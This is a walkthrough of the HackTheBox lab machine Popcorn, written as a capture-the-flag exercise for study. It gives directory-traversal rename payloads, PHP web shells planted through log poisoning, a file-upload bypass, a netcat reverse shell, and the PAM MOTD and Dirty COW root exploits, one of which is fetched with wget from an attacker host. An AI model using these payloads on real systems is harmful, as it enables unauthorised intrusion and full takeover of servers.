HackTheBox - Popcorn

Overview

This machine begins w/ web enumeration, discovering a .php file that allows user to rename files. There is a lack of input sanitization, allowing users to rename any file on the entire system by using directory traversal (../), similar to LFI.

There is a web application that allows user to upload and host torrent files. It is not possible to bypass this restriction, however there is another vulnerable function on the web application, users are allowed to add screenshot of the torrent file, and users are able to bypass the restriction, and upload .php files.

With the help of the rename page, we are able to find out the location of our reverse shell, rename it to .php and move it to the web root diretory, allowing us to obtain a low-privilege/www-data user.

For the privilege escalation part, the system is susceptible to a kernel exploit called dirtyc0w, simply running the exploit will root the machine. Also, the machine is susceptible to to a local privilege escalation exploit because of an outdated version of pam, simply running the exploit will root the machine.

---

Column	Details
Box Name	Popcorn
IP	10.10.10.6
Points	30
Difficulty	Medium
Creator	ch4p
Release Date	15 Mar 2017

Recon

TCP/80 (HTTP)

• FFUF

    cgi-bin/                [Status: 403, Size: 287, Words: 21, Lines: 11]
    index                   [Status: 200, Size: 177, Words: 22, Lines: 5]
    index.html              [Status: 200, Size: 177, Words: 22, Lines: 5]
    test                    [Status: 200, Size: 47137, Words: 2474, Lines: 651]
    torrent                 [Status: 301, Size: 312, Words: 20, Lines: 10]
    rename                  [Status: 301, Size: 309, Words: 20, Lines: 10]
  

  • rename
  • torrent

Initial Foothold

TCP/80 (HTTP) - What is rename/index.php doing?

1. Proceed to rename/index.php, it is a page that allows users to rename a specified file.
   • It could be vulnerable to directory traversal (../), allowing us to move a potentially sensitive file into the web directory for us to view.
2. Rename rename/index.php -> rename/rename.php as a test

    # Payload
    filename=/var/www/html/index.php&newfilename=/var/www/html/rename.php
   

   

   • If the file does not exist, PHP will disclose the full path of the php script that was executed.
   • Web Root Directory:
     • /var/www/
3. Attempt directory traversal (../) to rename rename/index.php to see if there are any input sanitization mechanism in place.

    # Payload
    filename=../../../../../../../../var/www/rename/index.php&newfilename=../../../../../../../../var/www/rename/rename.php 
   

   

   • Directory traversal works!
4. Attempt to view users on the machine by renaming /etc/passwd into the web directory.

    # Payload
    filename=../../../../../../../../etc/passwd&newfilename=../../../../../../../../var/www/passwd
   

   

   • Permission denied
5. To proceed, we have a few options
   1. LFI2RCE
   2. Upload a webshell w/ torrenthost and move webshell into a place where we can execute it. (/var/www/shell.php)

TCP/80 (HTTP) - LFI2RCE (Failed)

1. Include apache log file
   1. Validate the location of apache log files

       # Payload
       filename=../../../../../../../../var/log/apache2/access.log&newfilename=../../../../../../../../var/log/apache2/access.log
      

      

      • Permission denied
2. Include /proc/self/environ
   1. Validate the location of /proc/self/environ, it exists

       # Payload
       filename=../../../../../../../../proc/self/environ&newfilename=../../../../../../../../proc/self/environ
      

      

   2. Poison /proc/self/environ/, and attempt to move it to /var/www/, failed

       # Payload
       filename=../../../../../../../../proc/self/environ&newfilename=../../../../../../../../var/www/environ 
      		
       # User Agent
       <?php system(\$_GET['c']); ?>
      

      

      • failed to open stream
3. Include SSH log files
   1. Validate the location of /var/log/auth.log, it exists

       filename=../../../../../../../../var/log/auth.log&newfilename=../../../../../../../../var/log/auth.log
      

      

   2. Poison SSH Log

       ┌──(root💀kali)-[~/htb/popcorn/10.10.10.6/exploit/test]                  
       └─# ssh '<?php echo system($_GET["c"]); exit; ?>'@popcorn.htb 
      
      
      
       <?php echo system($_GET["c"]); exit; ?>@popcorn.htb's password:
      

   3. Attempt to move it to /var/www/, failed

       filename=../../../../../../../../var/log/auth.log&newfilename=../../../../../../../../var/www/auth.php
      

      

TCP/80 (HTTP) - Upload webshell.torrent on Torrent Host

1. Register an account for torrenthost
2. After some testing,
   1. torrenthost is able to tell if a file that already exists in their database is being uploaded by analyzing the contents of the uploaded file (I think). Thus, changing the filename does not bypass it.
   2. Changing the content of the torrent file even by a single character causes the file to be recognised as not a torrent file. So trying to insert a webshell into the contents of a torrent file w/ burp will not work.
3. Create our own webshell torrent file to upload
   1. Create webshell.torrent

       ┌──(root💀kali)-[~/htb/popcorn/10.10.10.6/loot]
       └─# cat webshell.php 
       <?php system($_GET['c']); ?>
      		
       ┌──(root💀kali)-[~/htb/popcorn/10.10.10.6/loot]
       └─# transmission-create webshell.php -o webshell.torrent
       WARNING: no trackers specified
       Creating torrent "webshell.torrent" .... done!
      

   2. Add a webshell into the Optional Name field
   3. Upload it, success!
4. Next, we have to find out where is webshell.torrent stored.
5. Simply rename popcorn.htb/torrent/index.php to popcorn.htb/torrent/index, so that we are able to view the directory listing of mirai.htb/torrent, this will allow us to browse the entire /torrent directory to find out where webshell.torrent is stored.

    # Payload
    filename=../../../../../../../../var/www/torrent/index.php&newfilename=../../../../../../../../var/www/torrent/index
   

   

   • torrents/ - webshell.torrent could be residing it in
6. Do what we did earlier, rename popcorn.htb/torrent/torrents/index.php to view the directory listing of popcorn.htb/torrent/torrents/
7. Found our webshell.torrent
8. Move it to /var/www/

    # Payload
    filename=../../../../../../../../var/www/torrent/torrents/0a6d9ecd5140c68d05343c711de65ab7f23cf81e.btf&newfilename=../../../../../../../../var/www/webshell.php 
   

   

9. Unfortunately, webshell.torrent did not contain any PHP code or our webshell.

TCP/80 (HTTP) - File Upload Bypass on Torrent Host

1. After skimming through torrenthost, there is a function that allow users to insert an image to display on their torrent.

    # Browse -> Select Webshell.php -> Edit This Torrent
   

   

2. After some testing,
   • .jpg, .png files are allowed
   • .php, Invalid File
3. How do we bypass the file upload restriction?
   1. Change the file extension .php -> .png
   2. Change Content-Type
   3. Add a Magic Header GIF89a
4. Upload php-reverse-shell.php and bypass the restriction

    # Payload
    ------WebKitFormBoundary2SsVFwbzBBilUqZy
    Content-Disposition: form-data; name="file"; filename="php-reverse-shell.png"
    Content-Type: image/png
   

   

5. Next, we have to find out where is php-reverse-shell.png stored
6. It resides in upload/
   • Notice the Last modified date.
7. Move it to /var/www w/ rename/index.php
8. Start listener

    ┌──(root💀kali)-[~/htb/popcorn/10.10.10.6/exploit]
    └─# nc -nvlp 4444
    Ncat: Version 7.92 ( https://nmap.org/ncat )
    Ncat: Listening on :::4444
    Ncat: Listening on 0.0.0.0:4444
   

9. Invoke reverse shell at /var/www/shell.php

    ┌──(root💀kali)-[~/htb/popcorn]
    └─# curl http://popcorn.htb/shell.php
   

   

10. Demo - Bypass restriction to upload webshell

Privilege Escalation - 1

Root - MOTD

1. Found something interesting in george home directory

    www-data@popcorn:/home/george$ find .
    .
    ./.bash_logout
    ./.bashrc
    ./torrenthoster.zip
    ./.cache
    ./.cache/motd.legal-displayed
    ./.sudo_as_admin_successful
    ./user.txt
    ./.nano_history
    ./.mysql_history
    ./.bash_history
    ./.profile
   

   • motd.legal-displayed
2. What is motd.legal-displayed
   • MOTD is the abbreviation of “Message Of The Day”, and it is used to display a message when a remote user login to the Linux Operating system using SSH.

3. Search exploits for motd

   Exploit Title	Path
   Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)	linux/local/14273.sh
   Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)	linux/local/14339.sh

4. How does pam_motd exploit work?
   • pam_motd (aka the MOTD module) in libpam-modules before 1.1.0-2ubuntu1.1 in PAM on Ubuntu 9.10 and libpam-modules before 1.1.1-2ubuntu5 in PAM on Ubuntu 10.04 LTS
   • Allows local users to change the ownership of arbitrary files via a symlink attack on .cache in a user’s home directory, related to “user file stamps” and the motd.legal-notice file.
5. Check pam version

    www-data@popcorn:/home/george$ dpkg -l | grep pam
    ii  libpam-modules                      1.1.0-2ubuntu1                    Pluggable Authentication Modules for PAM
    ii  libpam-runtime                      1.1.0-2ubuntu1                    Runtime support for the PAM library
    ii  libpam0g                            1.1.0-2ubuntu1                    Pluggable Authentication Modules library
   

   • 1.1.0
6. Try linux/local/14339.sh,
   1. Transfer 14339.sh to popcorn.htb
   2. Change permissions

       www-data@popcorn:/tmp$ chmod +x 14339.sh    
      

   3. Exploit!

       www-data@popcorn:/tmp$ bash 14339.sh 
       [*] Ubuntu PAM MOTD local root
       [*] Backuped /var/www/.ssh/authorized_keys
       [*] SSH key set up
       [*] Backuped /var/www/.cache
       [*] spawn ssh
       [+] owned: /etc/passwd
       [*] spawn ssh
       [+] owned: /etc/shadow
       [*] Restored /var/www/.cache
       [*] Restored /var/www/.ssh/authorized_keys
       [*] SSH key removed
       [+] Success! Use password toor to get root
       Password: 
       root@popcorn:/tmp# id;whoami
       uid=0(root) gid=0(root) groups=0(root)
       root
       root@popcorn:/tmp# 
      

      

Privilege Escalation - 2

Root - Kernel Exploit (Dirty c0w)

1. Identify kernel version

    www-data@popcorn:/home/george$ uname -a
    Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
    www-data@popcorn:/home/george$ 
   

   • 2.6.31 - susceptible to dirtyc0w kernel exploit
2. Try dirtyc0w exploit
   1. Download dirty.c
   2. Transfer to popcorn.htb

       www-data@popcorn:/tmp$ wget 10.10.14.14/dirty.c
       --2022-09-18 13:26:39--  http://10.10.14.14/dirty.c
      

   3. Compile dirty.c

       www-data@popcorn:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
       www-data@popcorn:/tmp$ chmod +x dirty 
      

   4. Exploit

       www-data@popcorn:/tmp$ ./dirty password                 
       /etc/passwd successfully backed up to /tmp/passwd.bak
       Please enter the new password: password    
       Complete line:                             
       firefart:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash
      		                                           
       mmap: b78a6000       		                
      

   5. Switch to firefart (root)

       www-data@popcorn:/tmp$ su firefart        
       Password:                                 
       firefart@popcorn:/tmp# id;whoami          
       uid=0(firefart) gid=0(root) groups=0(root)
       firefart                                  
       firefart@popcorn:/tmp#  
      

   6. OR SSH w/ firefart:password

       ┌──(root💀kali)-[~/htb/popcorn/10.10.10.6/exploit]  
       └─# sshpass -p 'password' ssh firefart@popcorn.htb     
      

      

Additional

LFI2RCE - Apache Log Files

1. Earlier we tried to poison apache log files, it failed because user www-data has insufficient permissions, if we were to change permissions so that www-data can execute it, it would have worked.

    root@popcorn:/var/log# ls -la | grep apache2
    drwxrw----  2 root      adm     4096 2022-09-18 14:55 apache2
   
    root@popcorn:/var/log/apache2# ls -la /var/log/apache2/access.log 
    -rw-r----- 1 root adm 398300 2022-09-18 14:21 /var/log/apache2/access.log
   

2. Change permissions

    root@popcorn:/var/log/apache2# chown -R www-data:www-data apache2/
   	
    root@popcorn:/var/log# ls -la | grep apache2
    drwxrw----  2 www-data  www-data    4096 2022-09-18 15:21 apache2
   

3. Poison apache logs

    ┌──(root💀kali)-[~/htb/popcorn/10.10.10.6/loot]
    └─#  curl "http://popcorn.htb/" -H "User-Agent: <?php system(\$_GET['c']); ?>"
    <html><body><h1>It works!</h1>
    <p>This is the default web page for this server.</p>
    <p>The web server software is running but no content has been added, yet.</p>
    </body></html>
   

4. Move /var/log/apache2/access.log to /var/www/log.php

    # Payload
    filename=/var/log/apache2/access.log&newfilename=/var/www/log.php 
   

   

5. The same can be done for SSH Log poisoning
6. Demo - LFI2RCE Apache log file poisoning